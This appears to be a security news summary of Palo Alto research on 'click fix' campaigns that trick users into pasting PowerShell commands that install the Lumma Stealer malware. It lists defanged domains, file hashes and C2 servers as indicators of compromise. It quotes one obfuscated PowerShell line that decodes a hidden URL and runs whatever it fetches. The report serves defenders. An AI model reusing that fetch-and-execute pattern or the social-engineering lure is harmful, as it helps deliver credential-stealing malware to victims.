Recent investigations from Palo Alto have shed light on the evolving landscape of “click fix” campaigns utilized for distributing the Lumma Stealer malware. These campaigns ingeniously exploit user interaction by embedding malicious scripts into the copy-paste buffer, effectively deceiving victims into executing harmful commands.
The “click fix” distribution method is characterized by malicious web pages that present users with seemingly benign instructions. Victims are prompted to open a run window, paste a preloaded PowerShell script from their clipboard, and execute it. This deceptive approach takes advantage of user trust, often masquerading as legitimate services to avoid raising any suspicions.
Attackers are continuously refining their strategies to evade detection and enhance the success rates of these campaigns. Recent developments include:
- Domain Impersonation: Registering domain names that closely resemble legitimate services to gain user trust, such as
windows-update[.]site. - Abuse of Trusted Platforms: Hosting malicious pages on reputable platforms, including Google Sites.
- PowerShell Script Delivery: Utilizing data binaries that combine text and binary data, allowing them to execute as PowerShell scripts.
- DLL Side-Loading: Distributing zip archives containing decoy files alongside legitimate executables to facilitate the side-loading of Lumma Stealer DLLs.
Malicious Activity
Example 1: Fake Google Meet Page
A fraudulent Google Meet page hosted on sites.google[.]com instructs users to execute a PowerShell command that downloads and runs a script from tlgrm-redirect[.]icu. The infection process unfolds as follows:
- Downloading a zip archive from
plsverif[.]cfd/1.zipthat contains Lumma Stealer files. - Extracting and executing a DLL file,
DuiLib_u.dll, through side-loading.
Example 2: Fake Windows Update Site
The site windows-update[.]site prompts users to run a PowerShell command that downloads a file from overcoatpassably[.]shop/Z8UZbPyVpGfdRS/maloy[.]mp4. This file is crafted with ASCII text and binary data, enabling it to function as a PowerShell script.
The PowerShell commands employed in these campaigns are meticulously designed to obscure malicious intent. For instance:
powershellpowershell -w hidden -c $a='[base64 text removed]'; $b=[Convert]::FromBase64String($a);$c=[System.Text.Encoding]::UTF8.GetString($b);Invoke-Expression (Invoke-WebRequest -Uri $c).Content
This command decodes Base64 text into a malicious script, which is subsequently executed.
Malicious traffic patterns observed during these infections include:
- HTTP POST requests to
tlgrmverif[.]cyou/log.php, confirming the successful execution of various stages. - Downloads from domains such as
plsverif[.]cfdandovercoatpassably[.]shop.
Active Lumma Stealer C2 Domains
Currently active command-and-control (C2) domains for Lumma Stealer include:
web-security3[.]comtechspherxe[.]top
In contrast, inactive C2 domains that no longer resolve are:
hardswarehub[.]todayearthsymphzony[.]today
Key files associated with these campaigns encompass:
- A PowerShell script retrieved from
tlgrm-redirect[.]icu/1.txt(SHA256: 909ed8a135…). - A zip archive containing Lumma Stealer files from
plsverif[.]cfd/1.zip(SHA256: 0608775a345…). - A DLL that is side-loaded by a legitimate executable (
DuiLib_u.dll, SHA256: b3e8b610ef…).
Indicators of Compromise
Active Domains Hosting Malicious Pages
windows-update[.]site(registered February 19, 2025)sites[.]google[.]com/view/get-access-now-test/verify-your-account
Associated Domains
Domains linked to these campaigns include:
authentication-safeguard[.]com(registered January 17, 2025)plsverif[.]cfd(registered March 1, 2025)tlgrmverif[.]cyou(registered January 11, 2025)
The ongoing evolution of tactics in these “click fix” campaigns underscores the sophistication of modern malware distribution techniques. By leveraging trusted platforms and employing advanced obfuscation methods, attackers are adeptly circumventing traditional detection mechanisms. It is imperative for organizations to remain vigilant, implement robust security measures, and educate users about the risks associated with executing unverified scripts.
